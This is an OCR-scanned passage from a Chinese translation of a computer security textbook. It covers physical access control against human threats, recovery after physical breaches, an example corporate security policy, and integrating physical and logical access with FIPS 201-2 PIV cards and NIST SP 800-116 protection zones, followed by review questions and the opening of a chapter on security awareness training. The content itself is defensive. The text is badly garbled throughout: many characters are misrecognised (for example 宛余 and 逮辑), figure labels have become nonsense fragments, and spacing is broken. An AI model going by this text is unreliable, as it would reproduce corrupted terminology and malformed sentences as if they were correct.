发 电机 。 为 提供 可 靠 服 务 ， 管 理 人 员 要 解决 一 系列 问题 ， 其 中 包括 产品 选择 、 发 电机 安装 、 人 
员 培 训 、 测 试 和 维护 计划 等 。 

为 了 处 理 电 磁 干 扰 ， 可 以 组 合 使 用 过 滤 和 屏蔽 装置 。 详 细 的 技术 处 理 细节 要 取决 于 基础 设 
施 设计 、 预 期 的 电磁 干扰 源 和 干扰 的 特性 。 


16.3.3 ”人 为 的 物理 威胁 


对 于 人 为 的 物理 威胁 ， 一 般 解 决 方法 就 是 物理 访问 控制 。 基 于 文献 [MICH06]， 我 们 推荐 
一 些 限制 对 设备 访问 的 方法 ， 这 些 方法 可 以 组 合 使 用 。 

1. 可 以 通过 限制 访问 存放 资源 的 建筑 物 的 方式 来 限制 对 资源 的 物理 接触 。 这 个 方法 能 拒绝 
外 部 人 员 的 访问 ， 但 是 不 能 解决 那些 没有 授权 的 内 部 人 员 或 员工 访问 的 问题 。 

2. 通过 把 资源 锁 在 一 个 柜子 、 保 险 柜 或 者 房间 里 来 限制 与 资源 的 物理 接触 。 

3. 一 个 机 器 可 以 被 访问 ,但 是 它 需 要 被 安全 地 连接 到 (可 能 是 永久 地 挫 在 ) 一 个 难以 移动 
的 物体 上 。 这 样 做 可 以 防止 盗窃 ,但 是 不 能 阻止 故意 破坏 、 非 授权 的 访问 或 者 误 用 。 

4. 使 用 一 个 安全 的 设备 控制 电源 开关 。 

5. 在 可 移动 的 资源 上 装备 一 个 追踪 设备 ， 这 样 一 个 自动 感应 门 就 可 以 给 安全 人 员 发 警报 ， 
或 者 触发 一 个 自动 门 来 阻止 这 个 设备 被 移动 到 安全 区 域 以 外 。 

6. 便携 设备 要 配备 一 个 追踪 设备 ， 那 么 就 可 以 随时 确定 它 的 当前 位 置 。 


上 述 的 前 两 个 方法 是 隔离 设备 的 。 能 够 用 来 进行 隔离 访问 控制 的 技术 ， 还 包括 使 用 人 员 巡 
兆 或 者 看 守 、 用 栅栏 对 区 域 进行 隔离 、 在 栅栏 ( 门 ) 上 设置 人 口 点 、 对 每 个 人 口 点 上 锁 和 录像 。 

物理 访问 控制 不 仅 能 解决 计算 机 和 其 他 IS 设备 的 问题 ， 也 可 以 解决 系统 连接 线 的 位 置 、 
电力 服务 、 高 压 交流 输电 (HVAC) 设备 和 分 布 式 系统 、 电 话 和 通信 线路 、 备 份 介质 和 文档 问题 。 

物理 访问 控制 除了 设置 物理 和 程序 上 的 障碍 外 ， 有 效 的 物理 访问 控制 体系 还 必须 包括 各 种 
传感器 和 警报 器 ， 这 些 传 感 器 和 警报 器 能 够 探测 到 入 侵 者 、 非 授权 的 访问 以 及 设备 的 搬 动 。 一 
般 来 说 ， 监 视 系统 也 是 建筑 安全 整体 中 的 一 部 分 ， 并 且 专 门 用 于 IS 区 域 的 监视 系统 也 是 必要 
的 。 这 些 系统 应 该 提供 实时 的 远程 监控 和 记录 。 

fda, Wi-Fi 的 引入 改变 了 物理 安全 的 概念 ， 因 为 它 扩 展 了 物理 边界 (如 墙壁 和 上 锁 门 ) 
的 物理 访问 。 例 如 ， 安 全 建筑 外 的 停车 场 通过 Wi-Fi 提供 访问 。 这 种 威胁 及 其 处 理 措施 将 在 第 
24 章 讨论 。 


16.4 物理 安全 破坏 的 恢复 


物理 安全 受到 破坏 以 后 ， 最 基本 的 恢复 方法 就 是 使 用 元 余 (redundancy)。 宛 余 不 能 解决 
任何 保密 性 的 问题 ， 比 如 说 对 数据 和 文档 的 偷窃 ， 但 是 它 的 确 能 恢复 丢失 的 数据 。 在 理想 情况 
下 ,系统 中 所 有 的 重要 数据 在 站 点 外 都 是 可 访问 的 ， 并且 要 在 权衡 成 本 / 收益 的 基础 上 对 其 进 
行 近乎 实时 的 更 新 。 在 宽带 连接 广泛 使 用 的 今天 ， 在 专用 网 络 或 者 Intemet 上 成 批 的 加 密 备 份 
就 是 一 种 佐证 ， 这 些 备份 能 够 在 管理 者 认为 适合 的 任何 时 候 完成 数据 的 恢复 。 在 极端 情况 下 ， 
能 在 网 站 以 外 建立 一 个 热 站 (hot site)， 它 时 刻 准备 着 马上 接管 该 网 站 的 运行 ， 并 可 近乎 实时 地 
获取 该 网 站 的 运行 数据 拷贝 。 

恢复 物理 损坏 的 设备 或 者 网 站 取决 于 其 被 损坏 的 程度 ， 而 且 更 重要 的 是 剩余 物 的 特性 。 
水 、 烟 、 火 灾 造 成 的 损坏 可 能 留 下 有 害 物 质 ， 在 正常 操作 和 正常 设备 能 够 被 重新 部 署 运行 之 
前 ， 这 些 危险 品 必须 被 小 心 辟 辟 地 从 现场 运 走 。 很 多 情况 下 ， 这 需要 从 外 面 聘请 灾害 恢复 专家 
来 进行 清理 。 


16.5 ”实例 : 有 某 公 司 的 物理 安全 策略 


为 了 让 读者 能 直观 地 体验 一 个 机 构 是 如 何 处 理 物理 安全 的 ， 我们 提供 一 个 在 物理 安全 策略 
方面 真实 的 例子 。 这 个 公司 是 一 个 欧盟 (European Union, EU) 的 工程 顾问 公司 ， 它 为 全 世界 
范围 内 的 基础 设施 建设 提供 规划 、 设 计 和 管理 服务 。 由 于 对 运输 、 水 利 、 海 事 和 投资 感 兴趣 ， 
这 个 公司 在 一 个 有 多 于 70 个 办 事 机 构 的 网 络 上 承接 70 多 个 国家 的 业务 委托 。 

文档 SecurityPolicy.pdf 的 第 1 部 分 (可 从 https://app.box.com/v/CompSec4e 获得 ) 摘自 公司 
的 安全 标准 文档 9?。 为 了 使 用 方便 ， 我 们 已 经 把 文档 中 出 现 的 公司 名 字 改 成 “公司 "”， 无 论 它 
出 现在 文档 中 的 哪个 位 置 。 该 公司 的 物理 安全 策略 很 大 程度 上 依赖 于 ISO 27002。 


16.6 ”物理 安全 和 逻辑 安全 的 集成 


物理 安全 包含 许多 的 检测 设备 ， 例 如 传感器 和 报警 咒 ， 还 有 许多 的 防御 设备 和 措施 ， 例 
如 锁 和 物理 屏障 。 应 当 明 确 ， 对 于 自动 化 和 各 种 计算 化 的 电子 设备 的 综合 运用 ， 还 有 许多 可 
以 发 挥 创造 力 的 地 方 。 显 然 ， 如 果 我 们 对 于 所 有 的 警告 器 和 报警 器 都 有 一 个 中 心目 标 ， 并 且 对 
所 有 的 目 动 访问 控制 机 制 都 有 一 个 中 央 控 制 ， 比 如 说 智能 卡 访问 系统 ， 那 么 物理 安全 就 会 更 加 
有 效 。 


日 ”整个 文档 ComputerSecurityPolicy.pdf 都 可 以 在 相同 的 站 点 上 获得 。 
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考虑 到 效率 和 成 本 这 两 方面 的 关系 ， 大 家 不 仅 增加 了 对 集成 自动 化 的 物理 安全 功能 的 兴 
趣 ， 而 且 更 进一步 地 增加 了 对 集成 自动 化 的 物理 安全 功能 和 逮 辑 安全 功能 的 兴趣 。 其 中 最 有 和 而 
望 的 领域 就 是 访问 控制 。 集 成 物理 和 逻辑 访问 控制 的 例 于 包括 : 

© 对 于 物理 和 逻辑 访问 使 用 同一 个 ID 卡 。 这 个 卡 可 以 是 一 个 简单 的 磁卡 或 者 是 一 个 智 

能 卡 。 

e 路 所 有 的 吴 份 和 访问 控制 数据 库 ， 单 步 实现 用 户 / 卡 的 注册 和 注销 。 

© 采用 一 个 ID 卡 中 心 管理 系统 代替 多 个 不 同 用 户 目录 和 数据 库 。 

。 将 事件 监控 和 相关 信息 统一 。 

作为 上 述 安全 集成 的 应 用 例子 ， 假 设 一 个 警报 指出 ，Bob 已 经 登录 公司 的 无 线 网 络 (一 个 
由 轩 辑 访问 控制 系统 产生 的 事件 )， 但 并 没有 进入 到 建筑 物 中 《一 个 由 物理 访问 控制 系统 产生 
的 事件 )。 综 合 在 一 起 看 ， 这 说 明 有 人 正在 盗 取 Bob 的 无 线 网 络 账户 。 


16.6.1 个 人 身份 验证 


由 于 物理 和 逮 辑 访问 控制 的 集成 将 走向 实用 ， 那 么 广大 的 产品 供应 商 就 必须 符合 标准 ， 这 
些 标准 包括 智能 卡 协议 、 身 份 认证 和 访问 控制 格式 及 协议 、 数 据 库 登 入 、 消 息 格式 等 。 这 方 
面 最 重要 的 工作 就 是 NIST 颁布 了 FIPS 201-2 (联邦 雇员 和 承包 商 的 个 人 身份 验证 ，2013 年 8 
月 )。 这 个 标准 为 实际 应 用 定义 了 一 个 可 靠 的 官方 范围 的 PIV 系统 ， 例 如 ， 对 联邦 政府 控制 的 
设施 和 信息 系统 的 访问 。 这 个 标准 详细 说 明了 一 个 PIV 系统 ， 在 这 个 系统 中 ， 能 够 建立 普通 
的 身份 认证 证 书 并 在 以 后 用 于 确认 一 个 访问 者 的 身份 。 这 个 标准 也 定义 了 联邦 政府 要 求 的 安全 
等 级 ， 该 等 级 按照 被 保护 的 设施 和 信息 所 面临 的 威胁 来 进行 划分 。 该 标准 同样 适用 于 私营 部 门 
的 承包 商 ， 可 以 为 任何 组 织 提供 有 用 的 指南 。 

图 16-2 给 出 了 符合 FIPS 201-2 标准 的 兼容 系统 的 主要 组 件 。PIV 的 前 端 定义 用 户 请 求 访 
问 一 个 设施 的 物理 接口 ， 它 可 以 是 对 一 个 被 保护 区 域 的 物理 访问 ， 也 可 以 是 一 个 对 信息 系统 
的 逻辑 访问 。PIV 前 端子 系统 支持 三 因素 认证 ， 使 用 的 因素 数量 取决 于 要 求 的 安全 等 级 。 前 病 
使 用 的 智能 卡 ， 又 被 称 为 PIV 卡 ， 它 是 一 个 双重 接口 的 接触 式 卡 或 者 非 接 触 式 卡 。 这 种 卡 中 
保存 了 持 有 者 的 照片 、X.509 认证 证 书 、 密 钥 、 生 物 特征 数据 ， 以 及 持 卡 者 的 唯一 认证 标识 
(Cardholder Unique Identifier，CHUID )， 后 面 会 给 出 解释 。 某 些 持 卡 者 的 信息 应 该 是 读 保 护 的 ， 
读 卡 器 要 使 用 个 人 标识 码 (Personal Identification Number, PIN) 来 进行 读 取 访问 。 在 目前 的 标 
准 版 本 中 ， 生 物 特征 识别 器 就 是 指纹 识别 器 或 虹膜 扫描 仪 。 

该 标准 为 卡 和 存储 在 卡 上 的 编码 数据 的 验证 定义 了 三 个 安全 等 级 ， 它 们 依次 对 持 有 证 书 
的 人 进行 真实 性 验证 。 普 通 安全 (some confidence) 级 别 使 用 读 卡 器 和 PIN。 高 级 安全 (high 
confidence) 级 别 增 加 了 一 个 指纹 生物 特征 比 对 ， 即 把 在 卡 发 放 过 程 中 采集 并 编码 在 卡 上 的 指 
纹 与 在 物理 访问 点 扫描 到 的 指纹 进行 比 对 。 更 高 安全 (very high confidence) 级 别 要 求 在 控制 
点 要 有 官方 观察 员 全 程 参与 上 面 撒 述 的 过 程 。 

PIV 系统 的 另 一 个 主要 组 件 是 PIV 卡 发 放 和 管理 子 系统 。 这 个 子 系统 包括 负责 身份 证 明和 
注册 的 组 件 、 卡 和 密 钥 的 发 放 与 管理 组 件 、 各 种 存储 库 和 服务 组 件 (比如 公 钥 基础 设施 (Public 
Key Infrastructure, PKI) 目录 、 认 证 状态 服务 )。 作 为 认证 基础 体系 的 一 部 分 ， 这 些 是 必需 的 。 

PIV 系统 与 一 个 访问 控制 子 系统 交互 ， 而 访问 控制 子 系统 负责 决定 一 个 特定 的 持 卡 者 能 否 
访问 某 个 物理 或 者 逻辑 资源 。FIPS 201-2 对 PIV 系统 和 访问 控制 系统 之 间 交 互 的 数据 格式 和 协 
议 进 行 了 标准 化 。 

与 大 多 数 访问 控制 卡 上 的 卡号 /设备 代码 编码 不 同 ， 通 过 使 用 一 个 截止 日 期 (必需 的 
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CHUID 数据 字段 ) 和 一 个 可 选择 的 CHUID 数字 签名 ，FIPS 201-2 CHUID 使 认证 达到 了 一 个 
新 的 水 平 。 通 过 检查 数字 签名 来 确保 卡 上 记录 的 CHUID 是 由 一 个 可 信 方 签 过 名 的 ， 而 且 也 能 
够 确保 这 个 CHUID 数据 自从 签名 之 后 没有 被 更 改过 。 对 CHUID 截止 日 期 的 检验 能 够 验证 这 
个 卡 是 否 过 期 。 这 与 卡 的 截止 日 期 和 持 卡 者 的 特权 之 间 的 关系 无 关 。 读 取 和 验证 CHUID 只 能 
提供 身份 的 担保 ， 因 为 它 认 证 的 是 卡 的 数据 而 不 是 持 卡 者 。PIN 和 生物 特征 提供 对 个 人 的 身份 
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图 16-2 FIPS 201 PIV 系统 模型 


图 16-3 基于 [FORR06] 说 明了 使 用 FIPS 201-2 的 物理 和 逻辑 访问 控制 的 整合 情况 。 系 统 
的 核心 包括 PIV 系统 、 访 问 控制 系统 ， 以 及 对 签名 的 CHUID 进行 证 书 授权 的 系统 。 这 个 图 的 
其 他 部 分 给 出 一 些 使 用 系统 核心 把 物理 和 逻辑 访问 控制 集成 在 一 起 的 例子 。 

如 果 物 理 和 逻辑 访问 控制 的 集成 扩展 已 经 超出 了 统一 标准 的 前 端 ， 而 成 为 一 个 对 系统 多 元 
素 的 集成 ， 那 就 增加 很 多 益处 ， 包 括 以 下 几 点 [FORR06]: 

e 员工 获得 一 个 单一 、 统 一 标准 的 访问 控制 认证 设备 ; 这 就 降低 了 把 令 牌 放 错 的 可 能 性 ， 

减少 了 训练 和 其 他 日 常 管理 费用 ， 而且 人 允许 无 缝 访问 (seamless access). 

e 为 员工 ID 管理 设置 一 个 单独 的 逻辑 单元 ， 从 而 减少 了 对 数据 副本 的 操作 ， 并 且 人 允许 对 
所 有 的 企业 资源 进行 即时 和 实时 的 授权 和 撤销 。 
审计 和 执法 部 门 有 一 个 对 访问 控制 进行 调查 的 中 心 数 据 库 。 
o 硬件 通用 能 够 减少 很 多 与 厂商 签订 的 购买 和 技术 支持 的 合约 。 
基于 认证 的 访问 控制 系统 也 能 平衡 其 他 安全 应 用 的 用 户 ID 证 书 ， 例 如 文档 的 电子 签名 
和 数据 加 密 。 


非 接触 式 智 物理 访问 控制 系统 
HE RUA a at 





可 选 的 生物 
特征 识别 器 


智能 卡 编程 器 特征 识别 器 
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(PACS ) 服务 器 智能 卡 识别 器 








销售 、 电 子 购物 和 其 他 应 用 


管 能 卡 和 生物 。 可 选 的 生物 
特征 中 间 件 特征 识别 器 








卡 注册 中 心 





S HEE 
识别 器 


Gee: 










可 选 的 生物 
人 力 资 源 数据 库 


E 活动 目录 
其 他 用 户 目录 


图 16-3 ”整合 实例 


RR: 基于 [FORR06] 


16.6.2 ”在 物理 访问 控制 系统 中 使 用 PIV 证 书 


FIPS 201-2 定义 了 个 人 证 书 的 特性 ， 这 些 特性 使 得 个 人 证 书 能 够 被 运用 于 政府 级 别 的 交 
互 操作 中 。 然 而 ， 在 需要 应 用 一 或 多 级 别 访问 控制 的 环境 中 ， 上 述 标 准 作 为 物理 访问 控制 系 
统 (Physical Access Control System, PACS) 的 一 部 分 ， 并 没有 特意 给 出 其 应 用 指导 。 为 了 提供 
这 样 的 指导 ，NIST SP 800-116 (物理 访问 控制 系统 (PACS) 中 使 用 PIV 认证 的 建议 ，2008 年 ) 
于 2008 年 发 布 ， 并 于 2017 年 修订 。 

NIST SP 800-116 使 用 了 以 下 的 认证 机 制 | : 


视觉 认证 (VIS): PIV 卡 的 视觉 身份 验证 是 由 门卫 人 工 完 成 的 。 门 卫 检 查 PIV 卡 的 真 
伪 ， 检 查 持 卡 人 和 卡 上 的 图 片 是 否 吻合 ， 检 查 卡 的 失效 日 期 ， 验 证 卡 上 其 他 信息 的 正 
确 性 ， 并 直观 地 验证 卡 上 的 安全 特征 。 

持 卡 人 唯一 标识 (CHUID): CHUID 是 PIV 卡 的 数据 对 象 。 实 现 认 证 时 ， 需 要 将 
CHUID 从 PIV 卡 传输 至 PACS. 

生物 认证 (BIO): 通过 使 用 从 PIV 卡 发 送 到 PACS 的 指纹 或 虹膜 的 数据 对 象 来 实现 
认证 。 

附加 生物 认证 ( BIO-A) : 该 认证 机 制 与 生物 认证 几乎 相同 ， 只 是 在 持 卡 人 使 用 PIV 卡 
以 及 提交 PIN 码 和 生物 认证 样本 时 ， 增 设 了 额外 的 监管 。 

PIV 认证 密 钥 (PKI): 利用 PIV 认证 密 钥 ，PACS 可 以 被 用 于 实现 基于 公 钥 密码 学 的 认 
证 。 鉴 于 持 卡 人 必须 输入 PIN 码 解锁 PIV 卡 方 可 认证 成 功 ， 使 用 PKI 的 认证 机 制 会 提 
供 双 因素 认证 。 

卡 认 证 密 钥 ( CAK): CAK 是 可 以 存在 于 任何 PIV 卡 上 的 可 选 密 钥 。 使 用 CAK 认证 机 
制 是 为 了 验证 PIV 及 其 所 有 者 。 在 诸多 PIV 密 钥 中 ，CAK 具有 以 下 特性 : 挑战 /应 答 
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HNF, CAK 可 以 被 用 于 非 接触 式 或 接触 式 接 口上 ; 而且， 使 用 CAK 时 无 须 输入 
PIN 48. 

FIPS 201-2 定义 了 以 上 除 CAK 外 的 其 他 认证 机 制 ，NIST SP 800-116 定义 了 CAK 这 种 可 
选 的 PIV 机 制 。NIST SP 800-116 被 提出 用 于 设置 一 个 环境 ， 在 该 环境 中 ， 一 个 设施 的 不 同 接 
入 点 具有 不 完全 相同 的 安全 需求 。 因 此 PIV 认证 机 制 应 该 被 选择 性 地 使 用 ， 以 符合 不 同 保护 
区 的 安全 需求 。 

NIST SP 800-116 建议 认证 机 制 应 该 是 基于 保护 区 域 进行 选择 的 ， 而 保护 区 依据 被 保护 的 
资产 和 资源 划 定 的 。 该 文档 采用 了 “ 受 控 、 限 制 、 隅 离 ” 区 域 的 理念 ， 如 [ARMY10] FE 
义 的 和 表 16-6 中 概括 的 一 样 。 从 流程 上 来 说 ， 从 属 关系 证 明 通 常 足 以 说 明 获 得 了 对 受 控 区 域 
的 访问 权 (例如 ， 持 有 机 构 的 证 章 可 以 允许 其 出 入 整个 总 部 )。 访 问 限制 区 域 往往 是 基于 功能 性 的 
子 组 或 个 体 角 色 (例如 ， 持 有 部 门 的 证 章 可 以 出 入 部 门 所 在 的 建筑 或 建筑 的 某 侧翼) 的 。 建 立 组 
内 的 个 别 成 员 身 份 或 角色 特权 需要 通过 持 卡 人 的 身份 认证 。 访 问 隔离 区 域 只 能 通过 个 人 的 授权 
来 获得 。 


表 16-6 保护 区 的 安全 与 控制 等 级 [ARMY10] 


分 级 描 Ok 
无 限制 级 不 涉及 安全 利益 的 设施 区 域 
这 部 分 受 限 重 地 通常 靠近 或 环绕 一 个 限制 或 阳 离 区域 。 仅 限于 有 访问 需求 的 人 员 方 可 进入 受 控 
受 控 级 区 域 。 经 授权 的 人 员 在 该 区 域 活动 时 不 必 受 控制 ， 这 是 因为 仅仅 进入 该 区 域 不 会 触及 安全 利益 。 


受 控 区 域 被 用 于 监管 控制 ， 保 障 安全 ， 或 作为 进一步 进入 限制 区 和 隅 离 区 域 的 缓冲 区 


该 受 限 区 域 非常 贴近 安全 利益 区 域 。 不 加 限制 的 活动 可 能 会 发 生 触 及 安全 利益 的 行为 。 护 送 或 
其 他 内 部 限制 可 以 阻止 访问 限制 区 域 


隔离 级 该 受 限 重地 包含 安全 利益 。 不 加 限制 的 活动 直接 触及 安全 利益 


图 16-4a 说 明了 NIST SP 800-116 定义 的 一 般 模 型 。 该 模型 刻画 了 可 用 于 访问 特定 区 域 的 
备 选 认证 机 制 ， 且 被 设计 为 至 少 满足 一 个 认证 条 件 即 可 进入 受 控 区 域 ， 满 足 两 个 条 件 可 进入 限 
制 区 域 ， 而 满足 三 个 条 件 则 可 进入 隔离 区 域 。 

图 16-4b 是 NIST SP 800-116 原则 应 用 于 商业 、 学 术 或 政府 设施 的 一 个 实例 。 访 客 登 记 区 
域 是 对 所 有 人 开放 的 区 域 。 在 上 述 实 例 中 ， 访 问 登 记 区 域 之 外 的 全 部 设施 全 属于 受 控 区 域 ， 只 
有 经 授权 的 人 员 及 其 拜访 者 方 可 进入 。 受 控 区 域 可 被 视 为 一 个 相对 低 风 险 的 区 域 ， 进 入 该 区 
域 的 用 户 的 身份 需要 得 到 某 种 程度 的 信任 。 对 于 其 中 的 部 分 设施 而 言 ， 形 如 CHUID+VIS 和 
CAK 的 单 因素 认证 机 制 是 很 合适 的 安全 策略 。 限 制 区 域 包含 于 受 控 区 域 之 中 ， 仅 限于 特定 群 
组 中 的 个 人 进入 。 它 可 被 认为 是 一 个 风险 适中 的 区 域 ， 且 PACS 可 为 其 中 颇 有 价值 的 资产 提供 
额外 的 安全 性 。 访 问 该 区 域 的 持 卡 人 的 身份 需 高 度 可 信 。 对 于 限制 区 域 而 言 ，BIO-A 和 PKI iA 
证 机 制 是 很 合适 的 安全 对 策 。 这 样 ， 结 合 访问 点 A 的 认证 方式 ， 进 入 限制 区 域 需要 双 因 素 认 
证 。 最 后 ， 高 风险 的 隔离 区 域 包含 于 限制 区 域 之 中 ， 仅 限于 特定 名 单 中 的 个 人 进入 。 持 卡 人 访 
A aA aR, PACS 应 该 提供 超 高 的 可 信 的 身份 认证 ， 它 可 以 通过 增加 一 个 不 同 于 访问 点 A 
和 B 的 第 三 个 认证 因素 来 实现 。 

图 16-4a 描绘 了 这 个 模型 ， 而 图 16-4b 为 应 用 举例 ， 该 实例 描述 了 这 个 受 限 重地 的 藤 套 架 
构 。 该 架构 未 必 适 用 于 所 有 设施 。 在 一 些 设施 中 ， 可 能 需要 直接 从 外 部 访问 限制 区 域 或 隔离 区 
域 。 在 这 种 情况 下 ， 所 有 必要 的 认证 必须 在 访问 点 实行 。 这 样 ， 一 个 直接 访问 隔离 区 域 的 点 应 
该 实行 一 种 组 合 策略 ， 其 结合 了 CHUID+VIS BIO 或 BIO-A 以 及 PKI 认证 机 制 。 
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a) 访问 控制 模型 





b ) 应 用 举例 
图 16-4 物理 访问 控制 中 认证 机 制 的 使 用 


16.7 关键 术语 、 复 习题 和 习题 


关键 术语 

corporate security (公司 安全 ) Personal Identity Verification (PIV， 个 人 身份 验证 ) 
environmental threats (环境 威胁 ) Physical Access Control System ( PACS， 物 理 访 问 
facilities security (设备 安全 ) 控制 系统 ) 

infrastructure security (基础 设施 安全 ) physical security (物理 安全 ) 

logical security (逻辑 安全 ) premises security (整体 安全 ) 

noise (噪声 ) technical threats (技术 威胁 ) 

overvoltage (过 电压 ) undervoltage (RJE) 

复 习题 


16.1 ”对 于 不 合适 的 温度 和 湿度 ， 主 要 考虑 的 问题 是 什么 ? 
16.2 ”火灾 造成 的 直接 和 间接 的 威胁 是 什么 ? 
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16.3 断 电 造 成 的 威胁 是 什么 ? 

16.4 - 列 出 并 描述 一 些 处 理 不 合适 的 温度 和 湿度 的 方法 。 

16.5 列 出 并 描述 对 火灾 的 一 些 处 理 措 施 。 

16.6 列 出 并 描述 对 水 的 损害 的 一 些 处 理 措施 。 

16.7 _. 列 出 并 描述 对 电力 损失 的 一 些 处 理 措施 。 

16.8 列 出 并 描述 处 理 人 为 物理 威胁 的 一 些 措施 。 

16.9 ”简要 定义 图 16-2 所 示 的 FIPS 201 PIV 模型 中 的 三 个 主要 子 系统 。 
16.10 (ZEE X NIST SP 800-116 中 描述 的 四 种 保护 区 类 型 。 


习题 


16.1 X 16-7 是 从 世界 银行 [WORL04] 出 版 的 技术 风险 检查 清单 ( Technology Risk Checklist) 中 抽取 的 ， 
该 清单 用 来 给 金融 机 构 和 其 他 机 构 提 供 指导 。 这 里 抽取 的 是 物理 安全 检查 清单 部 分 。 比 较 这 个 安 
全 策略 和 文件 SecurityPolicy. pdf 的 第 1 部 分 给 出 的 策略 (在 https://app.box.com/v/CompSec4e 可 
得 )。 看 看 有 什么 重 礁 和 不 同 的 部 分 。 


R 16-7 世界 银行 的 物理 安全 检查 清单 


54. 你 们 的 安全 策略 对 网 络 化 系统 设备 的 物理 访问 进行 限制 了 吗 ? 

55. 为 了 阻止 非 授权 访问 ， 你 们 的 物理 设备 访问 控制 使 用 了 生物 特征 认证 或 者 智能 卡 认 证 吗 ? 
56. 有 人 定期 检查 密 钥 卡 访问 系统 的 审计 记录 吗 ? 这 里 是 否 记 录 了 登录 失败 发 生 的 次 数 ? 
57. 软件 的 备用 拷贝 是 保存 在 一 个 安全 的 地 方 吗 ? 

58. 你 们 的 设备 在 所 有 的 时 间 里 都 安全 地 上 锁 了 吗 ? 

59. 你 们 的 网 络 设 施 有 监控 髓 或 者 监控 系统 来 追踪 异常 活动 吗 ? 

60. 所 有 不 用 的 “ 闯 口 ”都 关闭 了 吗 ? 

61. 你 们 的 设备 配备 警报 器 了 吗 ? 这 些 警 报 器 应 该 通知 对 系统 房间 和 设施 的 可 疑 人 侵 。 
62. 在 所 有 的 敏感 地 区 附近 都 布置 摄像 机 了 吗 ? 

63. 你 们 有 完全 目 动 的 灭火 系统 吗 ? 这 个 系统 在 检测 到 热 、 烟 和 灰尘 的 时 候 能 够 自动 激活 。 
64. 你 们 有 上 自动 的 湿度 控制 器 吗 ? 它 能 防止 出 现 损坏 设备 的 过 湿 的 环境 。 

65. 你 们 安装 自动 电压 控制 设备 来 保护 IT 资产 了 吗 ? 

66. 在 敏感 区 域 是 否 对 屋顶 加 强 了 防御 呢 (比如 说 服务 器 房间 ) ? 


16.2 有 没有 在 表 16-7 或 文件 Security Policypdf 的 第 1 部 分 中 提 到 ， 而 没有 在 本 章 中 论述 的 问题 ”如 果 
有 ， 讨 论 它 们 的 重要 性 。 

163 有 没有 在 本 章 中 提 到 的 问题 而 在 Security Policy.pdf 的 第 1 部 分 中 没有 涉及 ?如 果 有 ， 讨 论 它们 的 
重要 性 。 

16.4 ”使 用 简洁 的 描述 将 下 面 的 表格 填写 完整 。 


IT 安全 物理 安全 
边界 类 型 (边界 由 什么 组 成 ) 
标准 


CSP 


IC 

攻击 频率 
攻击 响应 (响应 类 型 ) 
攻击 者 的 风险 
危害 的 证 据 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

@ 描述 安全 意识 、 培 训 和 教育 过 程 的 益处 ; 
© 概述 雇用 实践 和 策略 ; 


o 讨论 电子 邮件 和 Internet 使 用 策略 的 要 求 ， 并 且 提 供 制 定 这 些 策略 的 指导 方针 ; 
。 解释 计算 机 安全 事件 响应 团队 的 作用 ; 
© 描述 计算 机 安全 事件 响应 涉及 的 主要 步骤 。 


这 一 章 覆 盖 了 大 量 的 主题 ， 用 一 个 更 恰当 的 术语 描述 ， 就 是 人 力 资 源 安 全 。 这 是 一 个 广泛 
的 课题 ， 对 这 一 主题 的 全 面 讨论 已 远 远 超 出 了 本 书 的 范围 。 在 这 一 章 ， 我 们 仅仅 讨论 这 一 领域 
的 一 些 重要 的 内 容 。 


17.1 安全 意识 、 培 训 和 教育 


安全 意识 、 培 训 和 教育 这 一 主题 在 许多 标准 和 与 标准 相关 的 文档 中 都 被 重点 提 到 过 ， 这 
标准 和 文档 包括 ISO 27002 (信息 安全 管理 实施 细则 ，2013 年 ) Al NIST SP 800-100 (信息 安 
手册 : 管理 者 指南 ，2006 年 10 月 )。 本 节 将 对 这 一 主题 做 一 个 概括 的 介绍 。 


17.1.1 动机 


安全 意识 、 培 训 和 教育 项 目 能 够 为 组 织 提供 以 下 4 个 方面 的 益处 : 

e 改善 员工 的 行为 。 

e 提升 员工 为 自己 的 行为 负责 的 能 力 。 

e 减轻 组 织 为 员工 的 行为 所 负 的 责任 。 

e 遵守 法 规 和 合同 的 义务 。 

员工 行为 ( employee behavior) 是 保证 计算 机 系统 和 信息 资产 安全 的 一 个 重要 方面 。 最 近 
的 一 些 调查 表明 ， 包 括 恶 意 和 无 意 在 内 的 员工 行为 ， 都 会 造成 相当 大 的 与 计算 机 有 关 的 损失 和 
安全 威胁 (如 [SYMA16]、[VERI16])。 员 工行 为 的 最 主要 问题 是 社会 工程 学 和 钓鱼 攻击 ， 铺 
误 和 遗漏 ， 其 允 ， 以 及 有 不 满 情绪 的 员工 的 活动 。 安 全 意识 、 培 训 和 教育 项 目 能 够 减少 由 错误 
和 遗漏 融 来 的 问题 。 

这 些 程序 通过 强化 员工 的 责任 意识 ， 增 加 应 有 的 处 罚 措施 ， 对 进行 欺骗 或 者 发 泄 不 满 的 员 
工 的 活动 形成 一 定 的 威慑 。 组 织 不 要 期 望 员 工 遵循 他 们 所 不 知 的 策略 或 者 程序 行事 。 进 一 步 地 
说 ， 当 发 现 员工 违反 组 织 的 规定 时 ， 如 果 员 工 声称 对 政策 或 程序 毫 不 知情 ， 执 行 强制 措施 将 会 
变 得 相当 困难 。 

正在 进行 的 安全 意识 、 培 训 和 教育 项 目 对 限制 组 织 的 责任 也 很 重要 。 这 些 项 目 可 以 对 组 织 
在 保护 信息 方面 已 经 采取 的 谨慎 措施 给 予 文 持 。 

最 后 ， 安 全 意识 、 培 训 和 教育 项 目 在 遵守 法 规 与 合同 义务 方面 会 很 有 用 。 例 如， 有 权 使 用 
客户 信息 的 公司 需 具 有 特别 的 意识 和 培训 责任 ， 以 此 来 约束 能 够 接触 客户 数据 的 员工 的 行为 。 


此 
全 
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17.1.2 ”持续 性 学 习 


许多 NIST 的 文档 以 及 ISO 27002 的 文档 都 意识 到 ， 对 于 一 个 与 安全 相关 的 员工 ， 学 习 的 
目标 依赖 于 员工 所 处 的 角色 。 因 此 就 需要 一 个 持续 的 学 习 计划 ， 从 增强 意识 开始 ， 进 而 培训 安 
全 技能 ， 并 逐渐 上 升 到 安全 教育 。 图 17-1 给 出 了 一 个 模型 ， 说 明了 在 一 个 包含 数据 和 设备 的 
信息 系统 中 ， 具 有 不 同 责任 和 角色 的 员工 所 需要 的 学 习 内 容 。 在 这 个 模型 的 底部 ， 所 有 的 员工 
都 需要 意识 到 安全 的 重要 性 ， 同 时 员工 也 要 对 策略 、 工 作 程 序 和 制度 有 一 个 大 致 的 理解 。 模 型 
的 中 间 两 层 为 培训 。 培 训 是 针对 使 用 IT 系统 和 数据 的 人 员 的 ， 他 们 需要 对 IT 安全 威胁 、 系 统 
